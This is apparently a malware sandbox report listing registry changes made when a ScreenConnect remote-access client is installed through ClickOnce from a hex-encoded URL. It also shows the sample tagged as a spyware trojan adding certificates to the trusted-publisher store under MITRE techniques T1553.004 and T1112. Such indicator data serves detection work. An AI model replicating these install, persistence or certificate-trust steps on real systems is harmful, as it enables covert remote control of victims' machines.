Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\Files	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\lock!06000000baab760f040b0000f4020000000000000000000 = 30303030306230342c30316462316536303335663234383730	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd\LastRunVersion = 68747470733a2f2f636c6f756466696c65732d7365637572652e696f2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6 = 68747470733a2f2f636c6f756466696c65732d7365637572652e696f2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 0000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e5	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a1 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_188970e3844df7b6\LastRunVersion = 68747470733a2f2f636c6f756466696c65732d7365637572652e696f2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9 = 68747470733a2f2f636c6f756466696c65732d7365637572652e696f2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb5	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Visibility	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 54007200750065000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 30003000300031002f00300031002f00300031002000300030003a00300030003a00300030000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\Files	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\lock!0e0000001eab760ffc090000ec040000000000000000000 = 30303030303966632c30316462316536303330363739346630	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\lock!18000000baab760f040b0000f4020000000000000000000 = 30303030306230342c30316462316536303335663234383730	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\VisibilityRoots	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\pin!S_{3f471841-eef2-47d6-89c0-d028f03a4ad5}	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\Files\ScreenConnect.WindowsClient.exe_6492277df = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\lock!01000000f5a9760ffc090000ec040000000000000000000 = 30303030303966632c30316462316536303330363739346630	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975\implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6 = 68747470733a2f2f636c6f756466696c65732d7365637572652e696f2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files\ScreenConnect.WindowsBackstageShell.exe.c = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\Transform = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Categories	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\lock!080000001eab760ffc090000ec040000000000000000000 = 30303030303966632c30316462316536303330363739346630	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\SizeOfStronglyNamedComponent = 3c72080000000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a1	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 680074007400700073003a002f002f0063006c006f0075006400660069006c00650073002d007300650063007500720065002e0069006f002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002300530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002c002000560065007200730069006f006e003d00320034002e0032002e00310030002e0038003900390031002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002f00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006500780065002c002000560065007200730069006f006e003d00320034002e0032002e00310030002e0038003900390031002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002c00200074007900700065003d00770069006e00330032000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\appid = 68747470733a2f2f636c6f756466696c65732d7365637572652e696f2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\identity = 53637265656e436f6e6e6563742e436c69656e742c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\DigestMethod = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 680074007400700073003a002f002f0063006c006f0075006400660069006c00650073002d007300650063007500720065002e0069006f002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006d0061006e00690066006500730074000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a	ScreenConnect.WindowsClient.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	30f954b33fe37f347cc504ddad29f13c36bad08a2c6caa25f2c1c36e41527623.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	30f954b33fe37f347cc504ddad29f13c36bad08a2c6caa25f2c1c36e41527623.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	30f954b33fe37f347cc504ddad29f13c36bad08a2c6caa25f2c1c36e41527623.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	